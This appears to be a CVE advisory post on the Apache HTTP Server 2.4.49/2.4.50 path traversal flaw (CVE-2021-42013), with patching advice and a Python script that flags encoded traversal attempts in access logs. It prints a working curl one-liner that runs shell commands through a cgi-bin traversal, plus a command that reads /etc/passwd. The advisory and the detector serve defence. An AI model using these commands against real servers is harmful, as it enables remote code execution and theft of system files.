How the mentioned CVE works:
The CVE-2021-42013 vulnerability is a path traversal and remote code execution flaw in Apache HTTP Server versions 2.4.49 and 2.4.50. The issue stems from an incomplete fix for CVE-2021-41773. A vulnerability in the path normalization logic allows an attacker to use crafted payloads containing encoded path traversal sequences, such as `.%2e/` or `%%32%65/`, to bypass security filters. If the `require all denied` directive is not set for specific directories like `files/`, a malicious actor can exploit this weakness. A specially crafted URL request can traverse the web root directory, potentially granting access to arbitrary files on the server’s filesystem. In configurations where CGI scripts are enabled, this traversal can be leveraged to achieve remote code execution, allowing the attacker to execute arbitrary shell commands on the underlying operating system with the privileges of the Apache process.
Platform: Apache HTTP Server
Version: 2.4.49/2.4.50
Vulnerability: Path Traversal
Severity: Critical
Date: 2021-10-07
Prediction: 2021-10-07
What Undercode Say:
`curl -H "User-Agent: Mozilla" "http://target/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh" -d "echo;id"`
`cat /etc/passwd`
`require all denied`
How the exploit works:
Craft URL with `.%2e/` sequences.
Target misconfigured CGI directories.
Execute system commands remotely.
Protection from this CVE:
Update to version 2.4.51.
Apply provided vendor patches.
Configure `require all denied`.
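To check access logs for the encoded sequences described above, the following added example (not part of the original post and not Apache's own code) percent-decodes each request path repeatedly and flags any that resolve to a `..` segment. The log lines are constructed samples, and the function names are chosen for this example.

```python
import re
from urllib.parse import unquote

# Request line and status inside an Apache common/combined log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+" (?P<status>\d{3})')
MAX_ROUNDS = 4  # upper bound on repeated percent-decoding

def decode_fully(path):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds

def classify(line):
    """Return (label, status, decoded_path) for a traversal attempt, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    raw_path = m.group("target").split("?", 1)[0]  # ignore the query string
    decoded, rounds = decode_fully(raw_path)
    if ".." not in decoded.replace("\\", "/").split("/"):
        return None
    label = ("literal", "encoded", "double-encoded")[min(rounds, 2)] + "-traversal"
    return label, int(m.group("status")), decoded

# Constructed sample entries (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.11 - - [07/Oct/2021:10:00:02 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 45',
    '192.0.2.12 - - [07/Oct/2021:10:00:03 +0000] "GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 403 199',
    '192.0.2.13 - - [07/Oct/2021:10:00:04 +0000] "GET /docs/my%20notes.txt HTTP/1.1" 200 90',
]

def scan(lines):
    """Return [(line_number, label, status, decoded_path)] for flagged lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        hit = classify(line)
        if hit:
            findings.append((n, *hit))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A flagged request that returned status 200 deserves the first look, since a 403 or 404 suggests the server refused the path.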
Impact:
Arbitrary File Read
Remote Code Execution
System Compromise
Sources:
Reported By: nvd.nist.gov

